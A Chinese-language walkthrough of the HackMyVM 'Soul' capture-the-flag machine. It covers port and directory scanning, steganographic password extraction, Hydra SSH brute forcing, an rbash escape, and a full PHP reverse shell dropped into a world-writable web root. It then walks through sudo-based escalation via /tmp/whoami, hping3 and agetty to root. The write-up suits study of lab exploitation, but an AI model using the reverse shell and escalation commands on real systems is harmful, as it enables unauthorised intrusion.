当前位置: 首页 > article >正文

【hackmyvm】soul靶机wp


tags:

  • HMV
  • rbash绕过
  • 图片隐写
  • PHP配置解析

1. 基本信息^toc

文章目录

    • 1. 基本信息^toc
    • 2. 信息收集
    • 3. 图片解密
      • 3.1. 爆破用户名
      • 3.2. 绕过rbash
      • 3.3. 提权检测
    • 4. 获取webshell
      • 4.1. 修改php配置
    • 5. www-data提权gabriel
    • 6. gabriel提取到Peter
    • 7. Peter提权root

靶机链接 https://hackmyvm.eu/machines/machine.php?vm=Soul
作者 sml
难度 ⭐️⭐️⭐️⭐️⭐️

2. 信息收集

端口扫描

┌──(pwncat-env)(root㉿kali)-[/home/kali/hmv/Soul]
└─# nmap  192.168.80.10 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-02 12:08 CST
Nmap scan report for 192.168.80.10
Host is up (0.00016s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:FC:DB:8A (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1.88 seconds

┌──(pwncat-env)(root㉿kali)-[/home/kali/hmv/Soul]
└─# fscan -h 192.168.80.10

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.4
start infoscan
192.168.80.10:80 open
192.168.80.10:22 open
[*] alive ports len is: 2

目录扫描

┌──(root㉿kali)-[/home/kali/hmv/Soul]
└─# dirsearch -u http://192.168.80.10/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/hmv/Soul/reports/http_192.168.80.10/__24-12-02_12-10-03.txt

Target: http://192.168.80.10/

[12:10:03] Starting:
[12:10:20] 200 -    9B  - /robots.txt

┌──(pwncat-env)(root㉿kali)-[/home/kali/hmv/Soul]
└─# gobuster dir -u http://192.168.80.10 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x jpg,php,html,png,zip,txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.80.10
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              jpg,php,html,png,zip,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 24]
/robots.txt           (Status: 200) [Size: 9]
/saint.jpg            (Status: 200) [Size: 190523]
Progress: 1453501 / 1453508 (100.00%)
===============================================================
Finished
===============================================================

网页信息

┌──(root㉿kali)-[/home/kali/hmv/Soul]
└─# curl http://192.168.80.10/
 <img src="saint.jpg">

┌──(root㉿kali)-[/home/kali/hmv/Soul]
└─# curl http://192.168.80.10/robots.txt
/nothing

┌──(root㉿kali)-[/home/kali/hmv/Soul]
└─# curl -o saint.jpg http://192.168.80.10/saint.jpg
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  186k  100  186k    0     0   118M      0 --:--:-- --:--:-- --:--:--  181M

saint.jpg
saint

到此 我们已经基本完成信息收集
目前得到的有

  • 图片 saint.jpg
  • 首页 <img src="saint.jpg">
  • 关键词 saint

下一步我们大概有这几种方式进行

  1. 解密图片。看图片里面是否存在可用信息
  2. 利用关键词作为用户名进行ssh爆破

3. 图片解密

既然给我们的东西很少,且只有一张图。那么这张图多半是有东西的
利用[[…/…/26-工具使用/StegSeek使用|stegseek]]工具解密

┌──(pwncat-env)(root㉿kali)-[/home/kali/hmv/Soul]
└─# stegseek  saint.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: ""
[i] Original filename: "pass.txt".
[i] Extracting to "saint.jpg.out".
the file "saint.jpg.out" does already exist. overwrite ? (y/n)
y

┌──(pwncat-env)(root㉿kali)-[/home/kali/hmv/Soul]
└─# cat saint.jpg.out
lionsarebigcats

获取到一个关键字符串 lionsarebigcats

尝试利用这个作为密码,将 saint 作为用户名进行登录。但是失败了
可能是用户名错误了

3.1. 爆破用户名

爆破一下用户名

┌──(root㉿kali)-[/home/kali/hmv/Soul]
└─# hydra -L /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -p lionsarebigcats 192.168.80.10 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-02 12:43:58
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 8295455 login tries (l:8295455/p:1), ~518466 tries per task
[DATA] attacking ssh://192.168.80.10:22/
[22][ssh] host: 192.168.80.10   login: daniel   password: lionsarebigcats

成功获取到用户名 daniel

ssh上来后发现我们在是一个限制模式的bash rbash,在这个模式下我们许多命令都用不了 比如cd命令

Last login: Thu Nov 26 05:27:42 2020 from 192.168.1.58
daniel@soul:~$ whoami
daniel
daniel@soul:~$ di
-rbash: di: command not found
daniel@soul:~$ id
uid=1000(daniel) gid=1000(daniel) groups=1000(daniel),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
daniel@soul:~$ cd /hotm
-rbash: cd: restricted

3.2. 绕过rbash

这篇文章里面有很多种[[…/渗透姿势库/rbash绕过|rbash绕过]]方式
https://www.freebuf.com/vuls/376922.html

daniel@soul:~$ awk 'BEGIN {system("/bin/bash")}'
daniel@soul:~$ /
bash: /: Is a directory

3.3. 提权检测

利用Linpeas进行提权检测
Pasted image 20241202131134
检测出/usr/sbin/agetty 很有可能

但我们这个用户用不了

daniel@soul:/tmp$ /usr/sbin/agetty -o -p -l /bin/sh -a root tty
bash: /usr/sbin/agetty: Permission denied

看来要转移到peter用户才行

4. 获取webshell

在用户目录里面没有看到可以利用的东西
可以去网站目录看一下

发现很奇怪的一点,网址目录的权限是777

drwxrwxrwx 2 root   root     4096 Nov 26  2020 .
drwxr-xr-x 3 root   root     4096 Nov 26  2020 ..
-rwxrwxrwx 1 root   root       24 Nov 26  2020 index.html
-rwxrwxrwx 1 root   root      612 Nov 26  2020 index.nginx-debian.html
-rwxrwxrwx 1 root   root        9 Nov 26  2020 robots.txt
-rwxrwxrwx 1 daniel daniel 190523 Nov 26  2020 saint.jpg

应该是希望我们往这里写一个webshell

往里面写入一个webshell

<?php

set_time_limit (0);
$VERSION = "1.0";
$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies.  Worth a try...
if (function_exists('pcntl_fork')) {
	// Fork and have the parent process exit
	$pid = pcntl_fork();
	
	if ($pid == -1) {
		printit("ERROR: Can't fork");
		exit(1);
	}
	
	if ($pid) {
		exit(0);  // Parent exits
	}

	// Make the current process a session leader
	// Will only succeed if we forked
	if (posix_setsid() == -1) {
		printit("Error: Can't setsid()");
		exit(1);
	}

	$daemon = 1;
} else {
	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
	printit("$errstr ($errno)");
	exit(1);
}

// Spawn shell process
$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
	printit("ERROR: Can't spawn shell");
	exit(1);
}

// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
	// Check for end of TCP connection
	if (feof($sock)) {
		printit("ERROR: Shell connection terminated");
		break;
	}

	// Check for end of STDOUT
	if (feof($pipes[1])) {
		printit("ERROR: Shell process terminated");
		break;
	}

	// Wait until a command is end down $sock, or some
	// command output is available on STDOUT or STDERR
	$read_a = array($sock, $pipes[1], $pipes[2]);
	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

	// If we can read from the TCP socket, send
	// data to process's STDIN
	if (in_array($sock, $read_a)) {
		if ($debug) printit("SOCK READ");
		$input = fread($sock, $chunk_size);
		if ($debug) printit("SOCK: $input");
		fwrite($pipes[0], $input);
	}

	// If we can read from the process's STDOUT
	// send data down tcp connection
	if (in_array($pipes[1], $read_a)) {
		if ($debug) printit("STDOUT READ");
		$input = fread($pipes[1], $chunk_size);
		if ($debug) printit("STDOUT: $input");
		fwrite($sock, $input);
	}

	// If we can read from the process's STDERR
	// send data down tcp connection
	if (in_array($pipes[2], $read_a)) {
		if ($debug) printit("STDERR READ");
		$input = fread($pipes[2], $chunk_size);
		if ($debug) printit("STDERR: $input");
		fwrite($sock, $input);
	}
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
	if (!$daemon) {
		print "$string\n";
	}
}

?> 

开启监听弹shell

发现没有弹成功。而且直接回显出了php文件的内容
说明这个php解析有问题

4.1. 修改php配置

在这个靶机上使用的是 Nginx 服务器
nginx对PHP-FPM的配置文件一般是/etc/nginx/sites-available/default
Pasted image 20241202162008
可以发现php的处理被注释掉了
但是我们当前用户也不能修改这个文件

观察配置文件可以发现这里有一个域名 lonelysoul.hmv

server {
        listen 80;
        listen [::]:80;
#
        server_name lonelysoul.hmv;
#
        root /var/www/html;
        index index.html;
#
        location / {
                try_files $uri $uri/ =404;
        }

 # pass PHP scripts to FastCGI server
        #
               location ~ \.php$ {
               include snippets/fastcgi-php.conf;
        #
        #       # With php-fpm (or other unix sockets):
               fastcgi_pass unix:/run/php/php7.3-fpm.sock;
        #       # With php-cgi (or other tcp sockets):
        #       fastcgi_pass 127.0.0.1:9000;
        }
}


lonelysoul.hmv 通过 server_name 匹配到了一个专门的配置块,该配置块包含了处理 PHP 请求的规则。

location / {
    try_files $uri $uri/ =404;
}

在默认服务器块(default_server)的配置中,location / 块只是尝试将请求作为文件或目录来查找,并没有将 .php 文件请求转发给 PHP-FPM,所以默认服务器块无法解析 PHP 文件,只会返回 404 错误

配置etc/hosts

vim /etc/hosts
192.168.80.10 lonelysoul.hmv

开启监听弹shell

nc -lvnp 1234
curl http://lonelysoul.hmv/shell.php

$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data

5. www-data提权gabriel

提权检测一下


sudo -l
Matching Defaults entries for www-data on soul:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on soul:
    (gabriel) NOPASSWD: /tmp/whoami

提示我们可以用 gabriel 用户的权限执行 /tmp/whoami
那我们将bash复制到/tmp 并改名whoami 即可获取到gabriel用户的bash

cp /bin/bash /tmp/whoami
sudo -u gabriel /tmp/whoami
whoami
gabriel

成功获取到 gabriel 用户

gabriel@soul:~$ cat user.txt
HMViwazhere

6. gabriel提取到Peter

检测一下

sudo -l
Matching Defaults entries for gabriel on soul:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User gabriel may run the following commands on soul:
    (peter) NOPASSWD: /usr/sbin/hping3

我们可以用 peter 的权限执行 /usr/sbin/hping3

gabriel@soul:~$ sudo -u peter /usr/sbin/hping3
hping3> /bin/bash
peter@soul:/home/gabriel$

7. Peter提权root

获取到了Peter用户权限 那么我们就可以用 agetty 提权了

/peter@soul:/home/gabriel$ /usr/sbin/agetty -o -p -l /bin/sh -a root tty

Debian GNU/Linux 10 soul tty

soul login: root (automatic login)

\[\e]0;\u@\h: \w\a\]\u@\h:\w$
\[\e]0;\u@\h: \w\a\]\u@\h:\w$ id
uid=1002(peter) gid=1002(peter) euid=0(root) groups=1002(peter)
\[\e]0;\u@\h: \w\a\]\u@\h:\w$ whoami
root
cat /root/rootflag.txt
HMVohmygod

http://www.kler.cn/a/458210.html

相关文章:

  • 接口测试Day04-postman生成测试报告ihrm项目
  • Redis Stream:实时数据处理的高效解决方案
  • 【Rust自学】9.2. Result枚举与可恢复的错误 Pt.1:match、expect和unwrap处理错误
  • 改善 Kibana 中的 ES|QL 编辑器体验
  • 【无线传感网】物理层及MAC层
  • 头歌实训2-1:面向对象程序设计-基础部分
  • vue在action中调用action的函数
  • 如何限制软件访问文件范围,阻止越权访问
  • UE5改变物体坐标轴位置
  • Vscode连接InternStudio进行debug
  • 从编译到电路:Verilog的“黑魔法“转换过程
  • 租赁小程序的优势与应用场景分析
  • 【JDBC】转账案例
  • KNN分类算法 HNUST【数据分析技术】(2025)
  • 探索PyTorch:从入门到实践的demo全解析
  • CES Asia 2025优惠期倒计时5天,科技盛宴即将开启
  • 如何在IDEA一个窗口中导入多个项目
  • 关于 VRRP的详解
  • 爬虫代理服务要怎么挑选?
  • Spring Security3.0.2版本
  • 计算机网络技术研究方向有哪些创新点
  • 华为电源工程师面试题
  • 基于物联网的园区停车管理系统的设计与实现
  • xinput1_3.dll放在哪里?当xinput1_3.dll丢失时的应对策略:详细解决方法汇总
  • API 接口如何确保数据的安全?
  • element下拉多选项回显